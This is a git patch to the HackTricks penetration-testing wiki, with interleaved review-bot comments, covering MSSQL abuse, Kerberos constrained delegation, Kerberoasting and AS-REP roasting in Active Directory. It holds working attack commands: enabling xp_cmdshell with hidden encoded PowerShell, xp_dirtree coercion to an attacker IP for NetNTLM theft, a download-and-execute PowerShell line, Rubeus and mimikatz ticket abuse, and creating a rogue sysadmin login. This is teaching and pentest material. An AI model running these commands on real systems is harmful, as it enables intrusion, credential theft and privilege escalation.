From b340d48881b8b6fe28d67b884e879c18606927fe Mon Sep 17 00:00:00 2001 From: CPol Date: Mon, 15 Aug 2022 13:00:19 +0000 Subject: [PATCH] GitBook: [#3389] No subject --- SUMMARY.md | 2 +- .../pentesting-mssql-microsoft-sql-server.md | 19 +-- .../active-directory-methodology/README.md | 6 +- ...l-trusted-links.md => abusing-ad-mssql.md} | 138 +++++++++++++++--- .../asreproast.md | 6 +- .../constrained-delegation.md | 79 +++++++--- .../kerberoast.md | 24 +-- .../printers-spooler-service-abuse.md | 6 + .../ntlm/places-to-steal-ntlm-creds.md | 8 +- .../dpapi-extracting-passwords.md | 2 +- 10 files changed, 209 insertions(+), 81 deletions(-) rename windows-hardening/active-directory-methodology/{mssql-trusted-links.md => abusing-ad-mssql.md} (55%) diff --git a/SUMMARY.md b/SUMMARY.md index a157dc4b6..560ac794c 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -167,7 +167,7 @@ * [Golden Ticket](windows-hardening/active-directory-methodology/golden-ticket.md) * [Kerberos Authentication](windows-hardening/active-directory-methodology/kerberos-authentication.md) * [Kerberoast](windows-hardening/active-directory-methodology/kerberoast.md) - * [MSSQL Trusted Links](windows-hardening/active-directory-methodology/mssql-trusted-links.md) + * [MSSQL AD Abuse](windows-hardening/active-directory-methodology/abusing-ad-mssql.md) * [Over Pass the Hash/Pass the Key](windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md) * [Pass the Ticket](windows-hardening/active-directory-methodology/pass-the-ticket.md) * [Password Spraying](windows-hardening/active-directory-methodology/password-spraying.md) diff --git a/network-services-pentesting/pentesting-mssql-microsoft-sql-server.md b/network-services-pentesting/pentesting-mssql-microsoft-sql-server.md index 7d276585c..12adec021 100644 --- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server.md +++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server.md 
@@ -16,20 +16,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -{% hint style="warning" %} -**Support HackTricks and get benefits!** - -Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -Discover **The PEASS Family**, our collection of exclusive **NFTs** - -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐊**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** -{% endhint %} - ## Basic Information **Microsoft SQL Server** is a [relational database management system](https://en.wikipedia.org/wiki/Relational\_database\_management\_system) developed by [Microsoft](https://en.wikipedia.org/wiki/Microsoft). As a [database server](https://en.wikipedia.org/wiki/Database\_server), it is a [software product](https://en.wikipedia.org/wiki/Software\_product) with the primary function of storing and retrieving data as requested by other [software applications](https://en.wikipedia.org/wiki/Software\_application)—which may run either on the same computer or on another computer across a network (including the Internet).\ 
@@ -116,6 +102,9 @@ crackmapexec mssql -d -u -p -x "whoami" #Username + Hash + PS command crackmapexec mssql -d -u -H -X '$PSVersionTable' +# Check if xp_cmdshell is enabled +SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell'; + #this turns on advanced options and is needed to configure xp_cmdshell sp_configure 'show advanced options', '1' RECONFIGURE @@ -142,7 +131,7 @@ msf> use auxiliary/admin/mssql/mssql_ntlm_stealer ### Abusing MSSQL trusted Links -[**Read this post**](../windows-hardening/active-directory-methodology/mssql-trusted-links.md) **to find more information about how to abuse this feature** +[**Read this post**](../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) **to find more information about how to abuse this feature** ### **Read files executing scripts (Python and R)** diff --git a/windows-hardening/active-directory-methodology/README.md b/windows-hardening/active-directory-methodology/README.md index 7153b928f..b6b341862 100644 --- a/windows-hardening/active-directory-methodology/README.md +++ b/windows-hardening/active-directory-methodology/README.md 
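Review bot: the `SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell'` check added in the @@ -116 hunk should name its columns, because `value` and `value_in_use` differ until `RECONFIGURE` has run and a reader looking at the first column will misread the state; `SELECT name, value, value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell';` shows both. The block it sits in already mixes crackmapexec commands with T-SQL under `#` comments; `#` is not a T-SQL comment, so anyone pasting that part into `mssqlclient.py` or SSMS gets an error on the comment line, and `--` would survive the paste.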
@@ -204,12 +204,12 @@ This attack aims to **use the user NTLM hash to request Kerberos tickets**, as a This attack is similar to Pass the Key, but instead of using hashes to request a ticket, the **ticket itself is stolen** and used to authenticate as its owner.\ [**More information about Pass the Ticket here**](pass-the-ticket.md)**.** -### MSSQL Trusted Links +### MSSQL Abuse & Trusted Links -If a user has privileges to **access MSSQL instances**, he could be able to use it to **execute commands** in the MSSQL host (if running as SA).\ +If a user has privileges to **access MSSQL instances**, he could be able to use it to **execute commands** in the MSSQL host (if running as SA), **steal** the NetNTLM **hash** or even perform a **relay** **attack**.\ Also, if a MSSQL instance is trusted (database link) by a different MSSQL instance. If the user has privileges over the trusted database, he is going to be able to **use the trust relationship to execute queries also in the other instance**. These trusts can be chained and at some point the user might be able to find a misconfigured database where he can execute commands.\ **The links between databases work even across forest trusts.**\ -[**More information about this technique here.**](mssql-trusted-links.md) +[**More information about this technique here.**](abusing-ad-mssql.md) ### Unconstrained Delegation diff --git a/windows-hardening/active-directory-methodology/mssql-trusted-links.md b/windows-hardening/active-directory-methodology/abusing-ad-mssql.md similarity index 55% rename from windows-hardening/active-directory-methodology/mssql-trusted-links.md rename to windows-hardening/active-directory-methodology/abusing-ad-mssql.md index bd56f7187..e6d9e3298 100644 --- a/windows-hardening/active-directory-methodology/mssql-trusted-links.md +++ b/windows-hardening/active-directory-methodology/abusing-ad-mssql.md @@ -1,4 +1,4 @@ -# MSSQL Trusted Links +# MSSQL AD Abuse
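Review bot: the rename of `mssql-trusted-links.md` to `abusing-ad-mssql.md` updates only the three references carried in this patch (SUMMARY.md, pentesting-mssql-microsoft-sql-server.md and this README); any other page still linking to `mssql-trusted-links.md` will 404 in GitBook, so grep the repo for the old filename before merging. In the README hunk, the second sentence is a fragment (`Also, if a MSSQL instance is trusted (database link) by a different MSSQL instance. If the user has privileges...`) and `he could be able to` should be `he may be able to`; suggest `Also, if a MSSQL instance is linked from another instance and the user has privileges over the linked one, he can use the trust relationship ...`.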
@@ -16,19 +16,18 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## MSSQL Trusted Links +## **MSSQL Enumeration / Discovery** -If a user has privileges to **access MSSQL instances**, he could be able to use it to **execute commands** in the MSSQL host (if running as SA).\ -Also, if a MSSQL instance is trusted (database link) by a different MSSQL instance. If the user has privileges over the trusted database, he is going to be able to **use the trust relationship to execute queries also in the other instance**. This trusts can be chained and at some point the user might be able to find some misconfigured database where he can execute commands. +The powershell module [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) is very useful in this case. -**The links between databases work even across forest trusts.** - -### **Powershell** - -```bash +```powershell Import-Module .\PowerupSQL.psd1 +``` -#Get local MSSQL instance (if any) +### Enumerating from the network without domain session + +```powershell +# Get local MSSQL instance (if any) Get-SQLInstanceLocal Get-SQLInstanceLocal | Get-SQLServerInfo @@ -39,8 +38,15 @@ Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP –Verbose –Threads #If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them #The discovered MSSQL servers must be on the file: C:\temp\instances.txt Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test +``` + +### Enumerating from inside the domain + +```powershell +# Get local MSSQL instance (if any) +Get-SQLInstanceLocal +Get-SQLInstanceLocal | Get-SQLServerInfo -# FROM INSIDE OF THE DOMAIN #Get info about valid MSQL instances running in domain #This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance) Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose 
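Review bot: the `Get-SQLInstanceLocal` / `Get-SQLInstanceLocal | Get-SQLServerInfo` pair is now duplicated in both new subsections (`Enumerating from the network without domain session` and `Enumerating from inside the domain`); local instance discovery does not depend on a domain session, so keep it once, directly under the `Import-Module` block, and let the two subsections hold only the UDP scan/credential test and the SPN-based enumeration respectively. Minor: `This looks for SPNs that starts with MSSQL` should read `that start with MSSQL`.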
@@ -51,9 +57,71 @@ Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose #Try to connect and obtain info from each MSSQL server (also useful to check conectivity) Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose +# Get DBs, test connections and get info in oneliner +Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo +``` + +## MSSQL Basic Abuse + +### Access DB + +```powershell +#Perform a SQL query +Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername" + #Dump an instance (a lotof CVSs generated in current dir) Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql" +``` +### MSSQL xp\_dirtree abuse + +Executing something such as `EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1` will make the MSSQL server to **login** to the specified **IP address**. + +### Steal NetNTLM hash / Relay attack + +Using **`xp_dirtree`** it's possible to **force** a NTLM **authentication**, therefore it's possible to **steal** the NetNTLM **hash** or even perform a **relay attack**. + +Using tools such as **responder** or **Inveigh** it's possible to **steal the NetNTLM hash**.\ +You can see how to use these tools in: + +{% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %} +[spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) +{% endcontent-ref %} + +### MSSQL RCE + +It might be also possible to **execute commands** inside the MSSQL host + +```powershell +Invoke-SQLOSCmd -Instance "srv-1.dev.cyberbotic.io,1433" -Command "whoami" -RawResults +# Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary +``` + +If **manually** you could just use: + +
#To enumerate the current state of xp_cmdshell
+SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
+# A value of 0 shows that xp_cmdshell is disabled. To enable it:
+sp_configure 'Show Advanced Options', 1; RECONFIGURE; sp_configure 'xp_cmdshell', 1; RECONFIGURE;
+# Execute
+EXEC xp_cmdshell 'whoami';
+EXEC xp_cmdshell 'powershell -w hidden -enc <blah>';
+ +### MSSQL Extra + +{% content-ref url="../../network-services-pentesting/pentesting-mssql-microsoft-sql-server.md" %} +[pentesting-mssql-microsoft-sql-server.md](../../network-services-pentesting/pentesting-mssql-microsoft-sql-server.md) +{% endcontent-ref %} + +## MSSQL Trusted Links + +If a MSSQL instance is trusted (database link) by a different MSSQL instance. If the user has privileges over the trusted database, he is going to be able to **use the trust relationship to execute queries also in the other instance**. This trusts can be chained and at some point the user might be able to find some misconfigured database where he can execute commands. + +**The links between databases work even across forest trusts.** + +### Powershell Abuse + +```powershell #Look for MSSQL links of an accessible instance Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0 
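Review bot: the manual `xp_cmdshell` block in this hunk uses `#` for its comments (`# A value of 0 shows that xp_cmdshell is disabled`, `# Execute`), which is not T-SQL comment syntax; pasted into `mssqlclient.py` or SSMS those lines error out, so use `--`. The `Invoke-SQLOSCmd` comment should also say that enabling `xp_cmdshell` needs the `ALTER SETTINGS` server permission (sysadmin or serveradmin), since the paragraph above it only says RCE "might" be possible. In the `xp_dirtree` paragraph, say who authenticates: the outbound SMB connection to `\\10.10.17.231\pwn` is made by the SQL Server service account, so the NetNTLMv2 that Responder/Inveigh capture belongs to that account (the machine account when the service runs as LocalSystem or a virtual account), and relaying it only works against targets that do not require SMB signing; `10.10.17.231` should be labelled as the attacker's listener.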
@@ -90,35 +158,51 @@ Notice that metasploit will try to abuse only the `openquery()` function in MSSQ ### Manual - Openquery() -From Linux you could obtain a MSSQL console shell with **sqsh** and **mssqlclient.py** and run queries like: +From **Linux** you could obtain a MSSQL console shell with **sqsh** and **mssqlclient.py.** -```bash -select * from openquery("DOMINIO\SERVER1",'select * from openquery("DOMINIO\SERVER2",''select * from master..sysservers'')') -``` - -From Windows you could also find the links and execute commands manually using a MSSQL client like [HeidiSQL](https://www.heidisql.com) +From **Windows** you could also find the links and execute commands manually using a **MSSQL client like** [**HeidiSQL**](https://www.heidisql.com)**** _Login using Windows authentication:_ ![](<../../.gitbook/assets/image (167) (1).png>) -_Find links inside the accessible MSSQL server (in this case the link is to dcorp-sql1):_\ -\_\_`select * from master..sysservers` +#### Find Trustable Links + +```sql +select * from master..sysservers +``` ![](<../../.gitbook/assets/image (168).png>) -Execute queries through the link (example: find more links in the new accessible instance):\ -`select * from openquery("dcorp-sql1", 'select * from master..sysservers')` +#### Execute queries in trustable link + +Execute queries through the link (example: find more links in the new accessible instance): + +```sql +select * from openquery("dcorp-sql1", 'select * from master..sysservers') +``` + +{% hint style="warning" %} +Check where double and single quotes are used, it's important to use them that way. +{% endhint %} ![](<../../.gitbook/assets/image (169).png>) You can continue these trusted links chain forever manually. 
-Some times you won't be able to perform actions like `exec xp_cmdshell` from `openquery()` in those cases it might be worth it to test the following method: +```sql +# First level RCE +SELECT * FROM OPENQUERY("", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''') + +# Second level RCE +SELECT * FROM OPENQUERY("", 'select * from openquery("", ''select @@servername; exec xp_cmdshell ''''powershell -enc blah'''''')') +``` + +If you cannot perform actions like `exec xp_cmdshell` from `openquery()` try with the `EXECUTE` method. ### Manual - EXECUTE -You can also abuse trusted links using EXECUTE: +You can also abuse trusted links using `EXECUTE`: ```bash #Create user and give admin privileges @@ -126,6 +210,14 @@ EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" ``` +## Local Privilege Escalation + +The **MSSQL local user** usually has a special type of privilege called **`SeImpersonatePrivilege`**. This allows the account to "impersonate a client after authentication". + +A strategy that many authors have come up with is to force a SYSTEM service to authenticate to a rogue or man-in-the-middle service that the attacker creates. This rogue service is then able to impersonate the SYSTEM service whilst it's trying to authenticate. + +[SweetPotato](https://github.com/CCob/SweetPotato) has a collection of these various techniques which can be executed via Beacon's `execute-assembly` command. +
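Review bot: the two new `OPENQUERY("", ...)` RCE examples have empty link names, so the quote nesting the warning hint refers to cannot be seen; put a placeholder such as `"LINKNAME"` (or the `dcorp-sql1` name used two lines earlier) in the empty strings. The same ```sql block uses `# First level RCE` / `# Second level RCE` comments, which are not T-SQL comments (`--` is), and the `EXECUTE` block below is fenced as ```bash although it is T-SQL. In the new Local Privilege Escalation section, `The MSSQL local user` should name the SQL Server service account (`NT Service\MSSQLSERVER` by default), which is the identity `xp_cmdshell` runs as and the one holding `SeImpersonatePrivilege`, and `Beacon's execute-assembly` should say Cobalt Strike, since SweetPotato works just as well from a plain `xp_cmdshell` shell.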
Support HackTricks and get benefits! diff --git a/windows-hardening/active-directory-methodology/asreproast.md b/windows-hardening/active-directory-methodology/asreproast.md index aefee3609..86d9f8afc 100644 --- a/windows-hardening/active-directory-methodology/asreproast.md +++ b/windows-hardening/active-directory-methodology/asreproast.md @@ -50,11 +50,15 @@ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashc {% code title="Using Windows" %} ```bash -.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast +.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username] Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast) ``` {% endcode %} +{% hint style="warning" %} +AS-REP Roasting with Rubeus will generate a 4768 with an encryption type of 0x17 and preauth type of 0. +{% endhint %} + ### Cracking ``` diff --git a/windows-hardening/active-directory-methodology/constrained-delegation.md b/windows-hardening/active-directory-methodology/constrained-delegation.md index c46a2a0ce..dbcc208cf 100644 --- a/windows-hardening/active-directory-methodology/constrained-delegation.md +++ b/windows-hardening/active-directory-methodology/constrained-delegation.md @@ -1,4 +1,4 @@ - +# Constrained Delegation
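Review bot: the asreproast hint about event 4768 should give the reader the fields that actually distinguish the roast: a normal AS-REQ from a Windows client logs Pre-Authentication Type 2 (PA-ENC-TIMESTAMP), while the roast request logs Pre-Authentication Type 0 together with Ticket Encryption Type 0x17 (RC4) for an account that has `Do not require Kerberos preauthentication` set. The same signature is produced by `GetNPUsers.py` from the Linux block above, so the hint should not single out Rubeus.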
@@ -16,54 +16,88 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+## Constrained Delegation -# Constrained Delegation +Using this a Domain admin can **allow** a computer to **impersonate a user or computer** against a **service** of a machine. -Using this a Domain admin can allow 3rd parties to impersonate a user or computer against a service of a machine. - -* **Service for User to self (**_**S4U2self**_**):** If a **service account** has a _userAccountControl_ value containing [TRUSTED\_TO\_AUTH\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx) (T2A4D), then it can obtains a TGS for itself (the service) on behalf of any other user. +* **Service for User to self (**_**S4U2self**_**):** If a **service account** has a _userAccountControl_ value containing [TRUSTED\_TO\_AUTH\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx) (T2A4D), then it can obtain a TGS for itself (the service) on behalf of any other user. * **Service for User to Proxy(**_**S4U2proxy**_**):** A **service account** could obtain a TGS on behalf any user to the service set in **msDS-AllowedToDelegateTo.** To do so, it first need a TGS from that user to itself, but it can use S4U2self to obtain that TGS before requesting the other one. **Note**: If a user is marked as ‘_Account is sensitive and cannot be delegated_ ’ in AD, you will **not be able to impersonate** them. -This means that if you **compromise the hash of the service** you can **impersonate users** and obtain **access** on their behalf to the **service configured** (possible **privesc**).\ -Also, you **won't only have access to the service that user is able to impersonate, but also to any service that uses the same account as the allowed one** (because the SPN is not being checked, only privileges). For example, if you have access to **CIFS service** you can also have access to **HOST service**.\ -Moreover, notice that if you have access to **LDAP service on DC**, you will have enough privileges to exploit a **DCSync**. 
+This means that if you **compromise the hash of the service** you can **impersonate users** and obtain **access** on their behalf to the **service configured** (possible **privesc**). -{% code title="Enumerate from Powerview" %} +Moreover, you **won't only have access to the service that the user is able to impersonate, but also to any service** because the SPN (the service name requested) is not being checked, only privileges. Therefore, if you have access to **CIFS service** you can also have access to **HOST service** using `/altservice` flag in Rubeus. + +Also, **LDAP service access on DC**, is what is needed to exploit a **DCSync**. + +{% code title="Enumerate" %} ```bash +# Powerview Get-DomainUser -TrustedToAuth Get-DomainComputer -TrustedToAuth + +#ADSearch +ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes cn,dnshostname,samaccountname,msds-allowedtodelegateto --json ``` {% endcode %} -{% code title="Using kekeo.exe + Mimikatz.exe" %} -```bash -#Obtain a TGT for the Constained allowed user +
# The first step is to get a TGT of the service taht can impersonate others
+## If you are SYSTEM in the server, you might take it from memory
+.\Rubeus.exe triage
+.\Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap
+
+# If you are SYSTEM, you might get the AES key or the RC4 hash from memory and request one
+## Get AES/RC4 with mimikatz
+mimikatz sekurlsa::ekeys
+
+## Request with aes
+tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05
+.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05 /opsec /nowrap
+
+# Request with RC4
 tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d
-#Get a TGS for the service you are allowed (in this case time) and for other one (in this case LDAP)
-tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLAR CORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL
-#Load the TGS in memory
-Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~ dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'  
-```
-{% endcode %}
+.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /rc4:cc098f204c5887eaa8253e7c2749156f /outfile:TGT_websvc.kirbi
+ +{% hint style="warning" %} +There are **other ways to obtain a TGT ticket** or the **RC4** or **AES256** without being SYSTEM in the computer like the Printer Bug and unconstrain delegation, NTLM relaying and Active Directory Certificate Service abuse + +**Just having that TGT ticket (or hashed) you can perform this attack without compromising the whole computer.** +{% endhint %} {% code title="Using Rubeus" %} ```bash -#Obtain a TGT for the Constained allowed user -.\Rubeus.exe asktgt /user:websvc /rc4:cc098f204c5887eaa8253e7c2749156f /outfile:TGT_websvc.kirbi #Obtain a TGS of the Administrator user to self .\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /impersonateuser:Administrator /outfile:TGS_administrator + #Obtain service TGS impersonating Administrator (CIFS) .\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /outfile:TGS_administrator_CIFS + #Impersonate Administrator on different service (HOST) .\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /altservice:HOST /outfile:TGS_administrator_HOST + +# Get S4U TGS + Service impersonated ticket in 1 cmd (instead of 2) +\.Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /user:dcorp-adminsrv$ /ticket:TGT_websvc.kirbi /nowrap + #Load ticket in memory .\Rubeus.exe ptt /ticket:TGS_administrator_CIFS_HOST-dcorp-mssql.dollarcorp.moneycorp.local ``` {% endcode %} -## Mitigation +{% code title="kekeo + Mimikatz" %} +```bash +#Obtain a TGT for the Constained allowed user +tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d + +#Get a TGS for the service you are allowed (in this case time) and for other one (in this case LDAP) 
+tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLAR CORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL + +#Load the TGS in memory +Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~ dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"' +``` +{% endcode %} + +### Mitigation * Disable kerberos delegation where possible * Limit DA/Admin logins to specific services @@ -71,7 +105,6 @@ Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp. [**More information in ired.team.**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation) -
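Review bot: the rewritten sentence `you won't only have access to the service that the user is able to impersonate, but also to any service` drops the qualifier the removed text had: the `/altservice` trick only reaches services running under the same account (hence the same key) as the SPN in `msDS-AllowedToDelegateTo`, because the KDC does not validate the service name but the ticket is still encrypted with that account's key; restore `any service that uses the same account as the allowed one`. In the TGT block, `.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /rc4:cc098f204c5887eaa8253e7c2749156f /outfile:TGT_websvc.kirbi` pairs the `dcorp-adminsrv$` account with the RC4 hash and output name that the removed line attached to `websvc`, while the kekeo line just above uses `8c6264140d5ae7d03f7f2a53088a291d` for the same account; pick one account/hash pair and use it consistently in the `s4u` commands below. Typos in the new lines: `taht`, `Constained`, `unconstrain delegation`, and `\.Rubeus.exe` in the one-command `s4u` example.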
Support HackTricks and get benefits! @@ -87,5 +120,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/windows-hardening/active-directory-methodology/kerberoast.md b/windows-hardening/active-directory-methodology/kerberoast.md index b512a5ada..640171570 100644 --- a/windows-hardening/active-directory-methodology/kerberoast.md +++ b/windows-hardening/active-directory-methodology/kerberoast.md @@ -1,4 +1,4 @@ - +# Kerberoast
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- -# Kerberoast +## Kerberoast The goal of **Kerberoasting** is to harvest **TGS tickets for services that run on behalf of user accounts** in the AD, not computer accounts. Thus, **part** of these TGS **tickets are** **encrypted** with **keys** derived from user passwords. As a consequence, their credentials could be **cracked offline**.\ You can know that a **user account** is being used as a **service** because the property **"ServicePrincipalName"** is **not null**. @@ -50,14 +49,24 @@ Invoke-Mimikatz -Command '"kerberos::list /export"' #Export tickets to current f {% code title="From Windows" %} ```bash +# Powerview Request-SPNTicket -SPN "" #Using PowerView Ex: MSSQLSvc/mgmt.domain.local + +# Rubeus .\Rubeus.exe kerberoast /outfile:hashes.kerberoast +.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.kerberoast #Specific user + +# Invoke-Kerberoast iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1") Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast ``` {% endcode %} -## Cracking +{% hint style="warning" %} +When a TGS is requested, Windows event `4769 - A Kerberos service ticket was requested` is generated. +{% endhint %} + +### Cracking ``` john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast @@ -65,7 +74,7 @@ hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt ./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi ``` -## Persistence +### Persistence If you have **enough permissions** over a user you can **make it kerberoastable**: 
@@ -77,7 +86,7 @@ You can find useful **tools** for **kerberoast** attacks here: [https://github.c If you find this **error** from Linux: **`Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)`** it because of your local time, you need to synchronise the host with the DC: `ntpdate ` -## Mitigation +### Mitigation Kerberoast is very stealthy if exploitable @@ -98,7 +107,6 @@ Get-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{ **More information about Kerberoasting in ired.team in** [**here** ](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting)**and** [**here**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled)**.** -
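Review bot: the new hint `When a TGS is requested, Windows event 4769 ... is generated` is true of every service-ticket request in the domain, so as written it gives a defender nothing to filter on; state what the `Get-WinEvent -FilterHashtable @{Logname='Security';ID=4769}` context line in the @@ -98 hunk already encodes, namely a 4769 with Ticket Encryption Type 0x17 (RC4) for an SPN on a user account, excluding `krbtgt` and computer accounts. Also, `Request-SPNTicket -SPN ""` has an empty placeholder; put the example SPN inside the quotes (`-SPN "MSSQLSvc/mgmt.domain.local"`) rather than in the trailing comment.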
Support HackTricks and get benefits! @@ -114,5 +122,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md b/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md index a77f7cb97..71333f811 100644 --- a/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md +++ b/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md @@ -81,6 +81,12 @@ If you are already inside the Windows machine you can force Windows to connect t C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\\file.txt ``` +### MSSQL + +```sql +EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1 +``` + ## HTML injection ### Via email diff --git a/windows-hardening/ntlm/places-to-steal-ntlm-creds.md b/windows-hardening/ntlm/places-to-steal-ntlm-creds.md index 64f2bbc50..97a9256c8 100644 --- a/windows-hardening/ntlm/places-to-steal-ntlm-creds.md +++ b/windows-hardening/ntlm/places-to-steal-ntlm-creds.md @@ -237,7 +237,7 @@ IconIndex=1337 We can create a shortcut containing our network path and as you as you open the shortcut Windows will try to 